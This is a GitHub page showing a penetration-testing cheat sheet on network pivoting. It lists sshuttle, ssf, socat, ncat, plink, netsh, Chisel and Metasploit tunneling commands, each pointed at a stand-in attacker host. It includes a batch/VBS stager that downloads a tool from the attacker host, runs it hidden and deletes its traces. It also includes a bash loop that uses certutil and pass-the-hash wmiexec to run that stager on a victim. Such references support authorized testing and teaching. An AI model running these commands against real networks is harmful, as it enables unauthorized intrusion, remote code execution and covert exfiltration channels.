-
Notifications
You must be signed in to change notification settings - Fork 36
/
Copy pathTarget.Network.Pivoting.txt
238 lines (182 loc) · 8.5 KB
/
Target.Network.Pivoting.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
`` Tunneling
`` sshuttle
~$ sshuttle -r VAR_USERNAME@VAR_TARGET_HOST VAR_TARGET_CIDR
`` ssf
`` polipo.conf
socksParentProxy = "127.0.0.1:8888"
socksProxyType = socks5
proxyAddress = "127.0.0.1"
proxyPort = 8881
logFile = "~/var/log/polipo"
diskCacheRoot = "~/var/cache/polipo"
`` Local (ssf.json)
{
"ssf": {
"tls" : {
"ca_cert_path": "./certs/trusted/ca.crt",
"cert_path": "./certs/certificate.crt",
"key_path": "./certs/private.key",
"key_password": "VAR_PASSWORD",
"dh_path": "./certs/dh4096.pem",
"cipher_alg": "DHE-RSA-AES256-GCM-SHA384"
},
"services": {
"datagram_forwarder": { "enable": true },
"datagram_listener": { "enable": true, "gateway_ports": false },
"stream_forwarder": { "enable": true }, "stream_listener": { "enable": true, "gateway_ports": false },
"copy": { "enable": true },
"shell": { "enable": true, "path": "/bin/bash", "args": "" },
"socks": { "enable": true }
}
}
}
~$ ssfd -l VAR_ATTACKER_HOST -p 11111 -c ssf.json
`` Remote (ssf.json)
{"ssf":{"arguments":"-F 8888 -p 11111 VAR_ATTACKER_HOST -m 99999 -t 15","tls":{"key_password":"VAR_PASSWORD"}}}
`` Deployment (ssf.bat)
@echo off
REM ssf.bat <ip> <port-socks> <port-remote>
REM ssf.exe -F <port-socks> -p <port-remote> VAR_ATTACKER_HOST -m 99999
REM ssf.exe -F 8888 -p 11111 <ip> -m 99999
cd /D "%~dp0"
setlocal
set vbs="wallpaper.vbs"
if exist %vbs% del /f /q %vbs%
>%vbs% echo Dim s_EnvArch, http, binary, fso, objShell, ZipFile, ShellScript
>>%vbs% echo s_EnvArch = CreateObject("WScript.Shell").ExpandEnvironmentStrings("x86")
>>%vbs% echo If Err.Number = 0 Then
>>%vbs% echo Select Case s_EnvArch
>>%vbs% echo Case "x86"
>>%vbs% echo s_Arch = "32"
>>%vbs% echo Case "AMD64"
>>%vbs% echo s_Arch = "64"
>>%vbs% echo End Select
>>%vbs% echo Else
>>%vbs% echo s_Arch = "Fail"
>>%vbs% echo End If
>>%vbs% echo URL = "http://%1/ssf-" ^& s_Arch ^& ".zip"
>>%vbs% echo ZipFile = "ssf.zip"
>>%vbs% echo Wscript.Echo "Pulling " ^& URL ^& "..."
>>%vbs% echo Set http = Nothing
>>%vbs% echo Set http = CreateObject("Microsoft.XMLHTTP")
>>%vbs% echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP")
>>%vbs% echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest")
>>%vbs% echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest.5.1")
>>%vbs% echo Set binary = createobject("Adodb.Stream")
>>%vbs% echo http.Open "GET", URL, False
>>%vbs% echo http.Send
>>%vbs% echo with binary
>>%vbs% echo .type = 1
>>%vbs% echo .open
>>%vbs% echo .write http.responseBody
>>%vbs% echo .savetofile ZipFile, 2
>>%vbs% echo end with
>>%vbs% echo Set http = Nothing
>>%vbs% echo Set binary = Nothing
>>%vbs% echo Set fso = CreateObject("Scripting.FileSystemObject")
>>%vbs% echo Set objShell = CreateObject("Shell.Application")
>>%vbs% echo CurrentDirectory = fso.GetParentFolderName(WScript.ScriptFullName)
>>%vbs% echo PathSource = fso.BuildPath(CurrentDirectory, "ssf.zip")
>>%vbs% echo PathExtract = fso.BuildPath(CurrentDirectory, "ssf")
>>%vbs% echo Set ZipFile = objShell.NameSpace(PathSource).items
>>%vbs% echo WScript.Echo "Extracting..."
>>%vbs% echo For Each objItem in ZipFile
>>%vbs% echo WScript.Echo objItem.Name
>>%vbs% echo Next
>>%vbs% echo If fso.FolderExists(PathExtract) Then
>>%vbs% echo fso.DeleteFolder PathExtract
>>%vbs% echo End If
>>%vbs% echo fso.CreateFolder(PathExtract)
>>%vbs% echo objShell.Namespace(PathExtract).CopyHere(ZipFile)
>>%vbs% echo Set objShell = Nothing
>>%vbs% echo Set objShell = CreateObject("WScript.Shell")
>>%vbs% echo objShell.CurrentDirectory = fso.BuildPath(CurrentDirectory, "ssf")
>>%vbs% echo Set objFile = fso.CreateTextFile("config.json", True)
>>%vbs% echo objFile.Write "{""ssf"": {""tls"": {""key_password"": ""VAR_PASSWORD""}}}"
>>%vbs% echo objFile.Close
>>%vbs% echo execPath = "ssf.exe -F %2 -p %3 %1 -m 99999 -t 15"
>>%vbs% echo objShell.Run execPath, 0, False
>>%vbs% echo Set objShell = Nothing
>>%vbs% echo Set fso = Nothing
>>%vbs% echo Set objShell = Nothing
>>%vbs% echo Set ZipFile = Nothing
cscript //nologo %vbs%
del /f /q %vbs%
del /f /q ssf\config.json
del /f /q ssf.zip
del /f /q ssf.b64
del /f /q ssf.bat
`` Deployment (downloader)
#!/usr/bin/env bash
NTLM_HASH=
DOMAIN=
USERNAME=
IP_SERVER=
IP_TARGET=
PORT_SOCKS=8888
PORT_REMOTE=11111
declare -a CMDS=(
"certutil.exe -urlcache -split -f \"http://$IP_SERVER/ssf.b64\" %temp%\ssf.b64"
"certutil -decode %temp%\ssf.b64 %temp%\ssf.bat"
"%temp%\ssf.bat $IP_SERVER $PORT_SOCKS $PORT_REMOTE"
)
for i in "${CMDS[@]}"
do
wmiexec.py -hashes $NTLM_HASH $DOMAIN/$USERNAME@$IP_TARGET "$i"
done
`` Port forwarding
`` tcpforward
~$ tcpforward -v -l 0.0.0.0:37999 -c localhost:3306
~$ tcpforward -v -l localhost:6666 -c VAR_ATTACKER_HOST:37999
`` Windows
`` netsh
~> netsh interface portproxy add v4tov4 listenport=37999 listenaddress=0.0.0.0 connectport=443 connectaddress=VAR_ATTACKER_HOST
`` plink.exe
~> plink -l VAR_USERNAME -pw VAR_PASSWORD -R 8889:127.0.0.1:3389 VAR_ATTACKER_HOST
`` nc
~$ mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe
`` Proxying
`` ncat
~$ ncat -lvkp 8080 -c "ncat --ssl VAR_TARGET_HOST 443"
`` socat
~$ socat tcp-listen:8080,fork tcp:VAR_TARGET_HOST:80
~$ socat tcp-listen:8080,fork openssl:VAR_TARGET_HOST:443,verify=0
~$ socat tcp-listen:445,reuseaddr,fork tcp:localhost:9445
~$ socat-ssl23 tcp-listen:8443,fork openssl:VAR_TARGET_HOST:443,verify=0
`` SOCKS
`` ssh
`` SOCKS over socat
~$ socat TCP-LISTEN:10022,fork SOCKS4:socks.VAR_TARGET_HOST:ssh-serv:22
~$ ssh -p 10022 loopback
`` a.VAR_TARGET_HOST -> b.VAR_TARGET_HOST -> c.VAR_TARGET_HOST -> d.VAR_TARGET_HOST -> Internet
a~$ ssh -2 -C -D 55557 -L 55556:127.0.0.1:55556 -L 55555:127.0.0.1:55555 [email protected]_TARGET_HOST
b~$ ssh -2 -C -D 55556 -L 55555:127.0.0.1:55555 [email protected]_TARGET_HOST
c~$ ssh -2 -C -D 55555 [email protected]_TARGET_HOST
`` SSH
~$ ssh -N -f -D 9000 username@VAR_TARGET_HOST
[ENTER] + [~C]
-D 1090
`` ncat
~$ ncat --proxy socks.VAR_TARGET_HOST:8000 --proxy-type socks4 VAR_TARGET_HOST 80
`` Firefox
network.proxy.socks_remote_dns = true
`` Metasploit
> use multi/handler
> set payload windows/meterpreter/reverse_https
> set lhost VAR_ATTACKER_HOST
> set lport VAR_ATTACKER_PORT
> set ExitOnSession false
> run -j
> use multi/manage/autoroute
> set session 1
> run
> use auxiliary/server/socks_proxy
> set version 4a
> set srvhost 127.0.0.1
> run -j
`` Chisel
-- On attacker machine
~$ ./chisel server -v -p VAR_ATTACKER_PORT --reverse
-- On victim machine
~$ ./chisel client -v VAR_ATTACKER_HOST:VAR_ATTACKER_PORT R:socks
~> chisel.exe client VAR_ATTACKER_HOST:VAR_ATTACKER_PORT R:socks